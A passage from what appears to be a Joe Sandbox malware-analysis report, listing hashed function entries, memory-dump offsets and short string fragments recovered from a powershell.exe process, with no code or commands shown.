Instruction Fuzzy Hash: C8F0B4745063005FC3209B7DE8987F77FA5EB41310F1048AEE24DC3241DB3969418BA1

Function 028C8969 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b971ea53730bd1caf6be9ebfd2fcba0a0f719eb4ca102a1226047a883adf550
Instruction ID: 42c98749948827dc625208d6c22af3299e1fee166a4ea34562c2ceca68bc195e
Opcode Fuzzy Hash: 9b971ea53730bd1caf6be9ebfd2fcba0a0f719eb4ca102a1226047a883adf550
Instruction Fuzzy Hash: A7F0E23930A3505FC706267AA8186BB3E5A9F86364F08006AE605C7242CF690E0A83E6

Function 028CF590 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26776a6823684cc7adb43b67c21cdaf7de5dbada84301fa21a3d40a07ce3c8ee
Instruction ID: 4ba5457d6740168084bc77bc8ef8daed53ea51705621aa670bbfdeb5edf6a96f
Opcode Fuzzy Hash: 26776a6823684cc7adb43b67c21cdaf7de5dbada84301fa21a3d40a07ce3c8ee
Instruction Fuzzy Hash: F601D2B1D1074ADBDB04DFE5C8446EEBBB1BF99300F20071AE105A6A00EBB06686CB80

Function 028C7968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6570052c00cbb30e976bee95dd3393149e0f614b9eb6bb063a750bee6b800ad5
Instruction ID: 47f1bfe842efddf63cf514ef91d10eb6873ae8682cee924d1b8c4a2f640ec44e
Opcode Fuzzy Hash: 6570052c00cbb30e976bee95dd3393149e0f614b9eb6bb063a750bee6b800ad5
Instruction Fuzzy Hash: 50F0A7397006159FC714965DEC44AAFB7EEEB88261B10093DE50DD3350DF34AC058BA5

Function 0285D998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2137814344.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_285d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec76eb0f3caa687f6cbd89f012f7f4245149f00ebead08ac2b4f437a2e85db0
Instruction ID: afed651f0443546736600265f42cb0ea1445e5901e7dc802516280e393c5124c
Opcode Fuzzy Hash: 6ec76eb0f3caa687f6cbd89f012f7f4245149f00ebead08ac2b4f437a2e85db0
Instruction Fuzzy Hash: F5F0F979104680AFD725CF06C985D23BBB9EF89664B298489EC4A8B712C671FC42CF60

Function 028C90F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6861fe42b024c00b6fc08d29a0819d8e7aaac91c1b3ef71fd0e47c6c18441c1e
Instruction ID: 0be06fb5e6197f4a9fa28fe68d4269278297966fac1ff291c4aadc0f9a9b098e
Opcode Fuzzy Hash: 6861fe42b024c00b6fc08d29a0819d8e7aaac91c1b3ef71fd0e47c6c18441c1e
Instruction Fuzzy Hash: 1EF027B97002045BD304BB69D0183AB7B97CFC0758F24C16ACA0A87384CE356D06CBD2

Function 028C7697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31114544e649864b1abd693532f4109ddd82eb910106219b680a975dfc23bbf
Instruction ID: a1ec12c50448325d41a8afc896cef6f0c8a8370e6359dfb35ae16d694176e881
Opcode Fuzzy Hash: e31114544e649864b1abd693532f4109ddd82eb910106219b680a975dfc23bbf
Instruction Fuzzy Hash: 62F08C7D7001188FCB10DA6D9950A9ABBAAEBC8751B154199EA0DCB325DB30DC058F91

Function 028CE008 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ffaf0ffc7d7eab9fe7617914c4f7c6f17002c6f133c89897474d7792a572864
Instruction ID: c2ccaec65764f2bb61462044e84c17ca3de816e1b18d40ae008501e0f6b02b23
Opcode Fuzzy Hash: 4ffaf0ffc7d7eab9fe7617914c4f7c6f17002c6f133c89897474d7792a572864
Instruction Fuzzy Hash: 5CE0ED397502108F82109B1DD454D26B7EAEFCE76572910AAE549CB735DB71EC02CB90

Function 028CDFF8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e85f8ef95b0fc67a488b697d255adce5995513b643bbcdc9c0ed441c5f852a
Instruction ID: 5a6025c37473788c697765584d34ecefdf2490330756091a3bbfb80037201b5d
Opcode Fuzzy Hash: 44e85f8ef95b0fc67a488b697d255adce5995513b643bbcdc9c0ed441c5f852a
Instruction Fuzzy Hash: 75F0303D3142408FC7018F19D4A4965BBB6AFCA32932910DAD486CB772DB72DC13CB80

Function 028CEAEE Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4a7cdd08f9d4c510703a30c75d7535c51a70e6e674efa8f9c26d6ae33bba70
Instruction ID: 7f0c6ea671bf8806aeae51ccb5d3f9fd915a3282222dad368d34cd184d10e7ab
Opcode Fuzzy Hash: 7e4a7cdd08f9d4c510703a30c75d7535c51a70e6e674efa8f9c26d6ae33bba70
Instruction Fuzzy Hash: 1AF06239A02214DFCB04CB98E589D9DBBB2FF88215B158155E905AB355CB31ED01CF40

Function 028CE968 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b59bc54cc22726b86de99aef4fb33a8e9b0dc5c3fa0cb201564a366c8c59d0
Instruction ID: a7f07ab5e6a7c518f0ef51233641ba85ac170fc78b99804a2c6af4cccf2ebbb0
Opcode Fuzzy Hash: 23b59bc54cc22726b86de99aef4fb33a8e9b0dc5c3fa0cb201564a366c8c59d0
Instruction Fuzzy Hash: 92E0867FB04314AA5B5445ACA8D05E9B7659BC8329F20413AD606E2601D772891B42A1

Function 028CAF98 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407221834858ba580185fdbb20ef0a81ff01fb79da1d5298bda78b5149780aea
Instruction ID: ae3db3fa4effd7cb1e079dba828bebc88e5479464c6de298fefee66bcafe30b8
Opcode Fuzzy Hash: 407221834858ba580185fdbb20ef0a81ff01fb79da1d5298bda78b5149780aea
Instruction Fuzzy Hash: A1E0862E31D3990F8B1A956D78200B6AF2347D3254338C1BAE045CA786DF32CD474351

Function 028C9178 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1113982463ee02212a363014a60f56954cc24059ca66e00597deb7d23e30de2
Instruction ID: e2a95dd17875d29715185eb16a4fa1bdf253040bb76a89f17bdb99dde35618e4
Opcode Fuzzy Hash: d1113982463ee02212a363014a60f56954cc24059ca66e00597deb7d23e30de2
Instruction Fuzzy Hash: 0EF06D749013044FD3609B79D49C3ABBBE6EB44350F00486DD61ED3340DB3969818B90

Function 028CF620 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8857de7f2b0679ab70985719d5b988fd05a83754129c47cb619e1902ab714fd8
Instruction ID: 113431edff6e0390ee08520102b1dd339061f4cb87b9ffd6ab665ce29249e4fe
Opcode Fuzzy Hash: 8857de7f2b0679ab70985719d5b988fd05a83754129c47cb619e1902ab714fd8
Instruction Fuzzy Hash: FFE01274D042599F8B50EFBD884299AFFF4EB49300B1091AEC949D7211EB315602DBE1

Function 028C8800 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617cc471106b0f31fa2f5c1509243cca91b32e21c23e93fbcff7bd846f294835
Instruction ID: 22830089ae35f416a2f79b0082067c9de3d5d64d066612a68b0f125a95bdbd60
Opcode Fuzzy Hash: 617cc471106b0f31fa2f5c1509243cca91b32e21c23e93fbcff7bd846f294835
Instruction Fuzzy Hash: FBE0D83490930A9F8704DBA5E8458BB7FB59F44205F104124EA45C3340DA314D55CBD0

Function 028C8978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea859ed1b15e14c4ec01204be60fe319cdc96205b32d4683d38a7e994d9fa8ec
Instruction ID: 60a26d9cc5e4ec8a8127d7bc5c276e41b378a2e79483bc826f971d821a7e02d5
Opcode Fuzzy Hash: ea859ed1b15e14c4ec01204be60fe319cdc96205b32d4683d38a7e994d9fa8ec
Instruction Fuzzy Hash: 27E04F397057149BCB09377AA41C2BF7A5BAFC4765F08002AD70AC7341DF7A5A0687EA

Function 028C9560 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6093145259b04c43ec00624c79cbd666836cbf5c3ba189ed493a7e6b1c16dc85
Instruction ID: 248b97c04e8efe96de85ca50796af49053eb30be67b530c47b0455951c7ea394
Opcode Fuzzy Hash: 6093145259b04c43ec00624c79cbd666836cbf5c3ba189ed493a7e6b1c16dc85
Instruction Fuzzy Hash: 4BD05EAE3821291B159570BE18006BB92CF8BC86A4B2A007EDA09C3646EF60CC0247E2

Function 028CDEA8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 6b00e433ca72e795c5dd9800d32cfda120273b88f6e2266757c379cd3144aebd
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 25E08639B10018A78B089559D4104D9F7A9EBCC224F14807ED90AE7740DB329916C6E1

Function 028CDE58 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40433cc1574d4b2b037b41e8366dbf446ecbeae0cb9daba14529275fb385bd7c
Instruction ID: 669d866d19504de8ee361cededa551fe6931c0f24dd2194b4f91fa72350ad238
Opcode Fuzzy Hash: 40433cc1574d4b2b037b41e8366dbf446ecbeae0cb9daba14529275fb385bd7c
Instruction Fuzzy Hash: 83E08C79701614478616661EA81085FBAABDFC46A1322843EE10DCB610DF74DC058B95

Function 028C8739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716b5091339bab319f33d619eac2e87d7cc12632cf5f045f8e44979660072564
Instruction ID: ee7abd74899e296f7cb8df0104aa97e665355be1966ae708f2d6b868acca834a
Opcode Fuzzy Hash: 716b5091339bab319f33d619eac2e87d7cc12632cf5f045f8e44979660072564
Instruction Fuzzy Hash: 57E0463885A20A9FCB0A9BA5E8498FEBF30EF50311B100269E703C2290DA310A46CA80

Function 028C9559 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f2c281c0fcf1b622abf51e41bd67b0774d94891a1e25bf0569f591c87ef154b
Instruction ID: 63a50c49f4eedc8778c34586dee936d513bda24d3abdd32e6cfe18cd8f0cc32a
Opcode Fuzzy Hash: 8f2c281c0fcf1b622abf51e41bd67b0774d94891a1e25bf0569f591c87ef154b
Instruction Fuzzy Hash: 0DD0C7AE7821154B559571BD14503BB82CB8BC42A9B3601BECA0EC7745EF34CC0387D2

Function 028C7932 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2263fce2f43ef965d9ad1d40e01f844ff7702b108d4c9469c2e0267d1f9a10c6
Instruction ID: 2365d69e4aa1d75815aabb114410b4f37472320d405c9b1f7374341d76299a42
Opcode Fuzzy Hash: 2263fce2f43ef965d9ad1d40e01f844ff7702b108d4c9469c2e0267d1f9a10c6
Instruction Fuzzy Hash: 79D0A7310483844FC7065B34A8304907F38EB4611530100DFE40A8B1A3CA6A9608CB81

Function 028CF630 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: f8d3c73aecdf455a983f4aa7a43a0bbc0b90df3f77a9da2ea4cb632d952a9f1b
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: E4D067B4D0420D9F8780EFADC94156EFBF4EB58204F60C5AE8919E7311E7329A12CBD1

Function 028C8748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fe1afb4068ec7dfe7a8714b4bc8730a62c8000c70f279be9ed207bb424890a
Instruction ID: 013234ce6cde5fd778080431c40645f4199d95e3f8633ca89cc289c1fac55178
Opcode Fuzzy Hash: d3fe1afb4068ec7dfe7a8714b4bc8730a62c8000c70f279be9ed207bb424890a
Instruction Fuzzy Hash: AAD0E2348162098B8B09ABA5E81A4BEBB34EB00201B400169DB06932A0AA301A4ACAC0

Function 028C8810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e301fbaa4a0076d556a2481ca356459d04aac2a65d42db32aaed29407d70959
Instruction ID: cbe2f8b3d617fcd0ccf82978e2ffd5d8c005b30e282cd34659d10a5a0ba6bd98
Opcode Fuzzy Hash: 1e301fbaa4a0076d556a2481ca356459d04aac2a65d42db32aaed29407d70959
Instruction Fuzzy Hash: CDD01738A0830A8F8B08EFA5E44A87EBFB5AF45205F004169DA49D3380EA305905CBC1

Function 028C7EA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f012ef6429e1cc67b02abaab784a5920c70ae28aa6f2c443aad44499d9501e52
Instruction ID: b14b1a82a264713cda6bd84cadee299b6401077e7ef9049ee20302f4fc09dd9f
Opcode Fuzzy Hash: f012ef6429e1cc67b02abaab784a5920c70ae28aa6f2c443aad44499d9501e52
Instruction Fuzzy Hash: B2C02B034583C03FEF07423C6C320817FF044476283068AC3D800C7022D81D8F03CA81

Function 028CEC17 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766ed91660bafa2c9dcba2038ee5095538cd5d1e1a524ba8a91c453fc3148bf3
Instruction ID: a9a6e2a6c9d15d69ff3e255a64a0143091ed2d2bd62387646e37d2247a188c3b
Opcode Fuzzy Hash: 766ed91660bafa2c9dcba2038ee5095538cd5d1e1a524ba8a91c453fc3148bf3
Instruction Fuzzy Hash: 39D0923AA01218CFCB04CB98E894ADDB371FF84315F208065E6159B251CB32E912CB80

Function 028C7940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037a287e17cd43b7998d69853b2376e85c321100396e2527bed1bf57c34a8143
Instruction ID: 6fce1eaf0ff148159a8db4373c50fc4a24e777cb0c73cd6f2a61f0b569ca6556
Opcode Fuzzy Hash: 037a287e17cd43b7998d69853b2376e85c321100396e2527bed1bf57c34a8143
Instruction Fuzzy Hash: FAB092300487088FC2486F79A8448157329EB4521978004ECE90E0A292CE3AE889CE45

Function 028CBD60 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc7b42aa310d483967fdd46cc5f69bfd43feb6dc52be9574842fe2e92cfc74c
Instruction ID: e7048498c86d0d3df565f5c88b18f358279bde96cb5dd58ab1545cd72987a56d
Opcode Fuzzy Hash: 5dc7b42aa310d483967fdd46cc5f69bfd43feb6dc52be9574842fe2e92cfc74c
Instruction Fuzzy Hash: 59A002257533114AAB086F335A4C27B3ADBABC05D2F4CD4B5B581C4195DE3DC1456615

Non-executed Functions

Function 07021BE0 Relevance: 20.4, Strings: 16, Instructions: 401COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07021FDF
JUl, xrefs: 0702200B
4']q, xrefs: 07021C86
JUl, xrefs: 070220C2
JUl, xrefs: 070220CE
tP]q, xrefs: 07021FEB
4']q, xrefs: 07021F95
rTl, xrefs: 07021C53
JUl, xrefs: 07022017
$cGk, xrefs: 070220B4
84Rl, xrefs: 07021F6C
84Rl, xrefs: 07021F76
4']q, xrefs: 07021F89
JUl, xrefs: 07021FA1
4']q, xrefs: 07021C92
rTl, xrefs: 07021C5D

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: $cGk$4']q$4']q$4']q$4']q$84Rl$84Rl$tP]q$tP]q$JUl$JUl$JUl$JUl$JUl$rTl$rTl
API String ID: 0-1556152091
Opcode ID: 07d5669f266448122db9b6bc36de5571014adfe64daa2ce708990523a3f683c8
Instruction ID: e8fc8f614073e620306e24a58c69724f0d2d8b5c92c7d939138b999d1068c198
Opcode Fuzzy Hash: 07d5669f266448122db9b6bc36de5571014adfe64daa2ce708990523a3f683c8
Instruction Fuzzy Hash: 87D15AB2B0422ACFC7648B68984066BBBF6EFC5310F15C66BC955CB252DB31C847D7A1

Function 07024408 Relevance: 14.2, Strings: 11, Instructions: 466COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07024597
4']q, xrefs: 070248C9
XYTl, xrefs: 070246FF
0U]q, xrefs: 07024423
XYTl, xrefs: 070246F3
TDk, xrefs: 070246E5
DUDk, xrefs: 07024895
4']q, xrefs: 070248D5
4']q, xrefs: 07024719
4']q, xrefs: 07024725
tP]q, xrefs: 0702458B

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: TDk$0U]q$4']q$4']q$4']q$4']q$DUDk$XYTl$XYTl$tP]q$tP]q
API String ID: 0-2262986563
Opcode ID: d234bb75d2250dcc1f04d8daa1b80b30385a5fd6ed4051b03464d5c0196b57bc
Instruction ID: c354e007145dee7ec064b98a32113e904f77a1bd278b689060f0b11b29232c7d
Opcode Fuzzy Hash: d234bb75d2250dcc1f04d8daa1b80b30385a5fd6ed4051b03464d5c0196b57bc
Instruction Fuzzy Hash: 70E18AB2B042A58FCB54DB68C85466AFBE6EFC6310F24C67AE555CB252DA31CC03C761

Function 07023928 Relevance: 12.8, Strings: 10, Instructions: 319COMMON

Download Yara Rule

Strings

Jl, xrefs: 07023A1D
4']q, xrefs: 07023B35
$]q, xrefs: 0702396C
tP]q, xrefs: 070239B1
Jl, xrefs: 07023A0F
$]q, xrefs: 07023C0E
4']q, xrefs: 07023B29
$]q, xrefs: 0702393A
$]q, xrefs: 07023960
tP]q, xrefs: 070239A5

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-3077390536
Opcode ID: fd49349133c39d5b4353144290041468a819185703ccbf21960179bc93b51021
Instruction ID: 0869141d446398e0df3d3d4311181ace4ad9db6bb790694862e4ef5bbffb79bf
Opcode Fuzzy Hash: fd49349133c39d5b4353144290041468a819185703ccbf21960179bc93b51021
Instruction Fuzzy Hash: 61A17AB37043258FC7658F299840B6AFBF6AFC6710F24856BD945CB291CA39C842D761

Function 07020568 Relevance: 9.2, Strings: 7, Instructions: 402COMMON

Download Yara Rule

Strings

fbq, xrefs: 0702094B
rTl, xrefs: 07020935
4']q, xrefs: 07020962
4']q, xrefs: 070205EC
4']q, xrefs: 0702096E
rTl, xrefs: 0702092B
4']q, xrefs: 070205F6

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: fbq$4']q$4']q$4']q$4']q$rTl$rTl
API String ID: 0-851107951
Opcode ID: 684a9b7982e40bcdf8b3fc9911dc7099425eb7f1faef67fadd00d9ea0d5bc3f8
Instruction ID: 31c23707c4967d843a2a1e128207bfb55048b7c96362b9204661e997c01e1b88
Opcode Fuzzy Hash: 684a9b7982e40bcdf8b3fc9911dc7099425eb7f1faef67fadd00d9ea0d5bc3f8
Instruction Fuzzy Hash: 34D158B2B043658FC7159B6898507AABFE2EFC2310F14C5BAD585CB252DB358C47C7A2

Function 07023280 Relevance: 9.0, Strings: 7, Instructions: 252COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07023324
RTl, xrefs: 0702342B
tP]q, xrefs: 07023330
RTl, xrefs: 07023294
,STl, xrefs: 07023469
,STl, xrefs: 0702345D
p5Dk, xrefs: 0702344F

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: ,STl$,STl$p5Dk$tP]q$tP]q$RTl$RTl
API String ID: 0-429453677
Opcode ID: 56a1ec15c96672a909709a1315687912538c4f65272df930aa58775160029c29
Instruction ID: c26ca60263906b853470c50a28ce6424b0767f5a3dd1de641e96cc75cb8fc414
Opcode Fuzzy Hash: 56a1ec15c96672a909709a1315687912538c4f65272df930aa58775160029c29
Instruction Fuzzy Hash: B4818DB2B043259FCB218B288C5176AFFF2AFC6310F14C5ABD549CB241DA79D946C7A1

Function 07023678 Relevance: 8.9, Strings: 7, Instructions: 185COMMON

Download Yara Rule

Strings

$]q, xrefs: 070237FF
$]q, xrefs: 07023836
4']q, xrefs: 07023722
Jl, xrefs: 0702386D
4']q, xrefs: 0702372E
Jl, xrefs: 0702387B
$]q, xrefs: 0702382A

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-97210084
Opcode ID: 46a02ff4318e87884375043ba2b05fda2fe182e52c5e839c03d2d71bf456e99c
Instruction ID: d10814458ea1e6500dfea33d17304a94052ef3a3cea8c695feb2d4f94e322d2c
Opcode Fuzzy Hash: 46a02ff4318e87884375043ba2b05fda2fe182e52c5e839c03d2d71bf456e99c
Instruction Fuzzy Hash: 26517AB27043269FCB349A29880076AFBF6AFC2610F24857BC455CB251DB39C847D791

Function 028C7A21 Relevance: 6.5, Strings: 5, Instructions: 245COMMON

Download Yara Rule

Strings

`^q, xrefs: 028C7B23
`^q, xrefs: 028C7CC2
`^q, xrefs: 028C7BA2
tMTl, xrefs: 028C7AD4
`^q, xrefs: 028C7C44

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

